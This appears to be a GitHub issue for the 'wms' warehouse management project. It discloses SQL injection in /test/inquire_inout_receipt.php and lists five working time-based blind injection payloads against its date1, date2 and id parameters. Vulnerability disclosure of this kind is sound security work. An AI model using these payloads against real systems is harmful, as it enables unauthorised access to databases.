wms icon indicating copy to clipboard operation
wms copied to clipboard

Published 20 hours ago verified publisher icon FeMiner

SQL injection in /test/inquire_inout_receipt.php

Open YanC1e opened this issue 1 month ago • 0 comments

Image

The id,date1,date2 parameters are injectable, and its principle and https://github.com/FeMiner/wms/issues/17 almost. payload:

/test/inquire_inout_receipt.php?option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=date&date2=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=warehouse&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=company&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=type&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

YanC1e avatar Jan 27 '25 17:01 YanC1e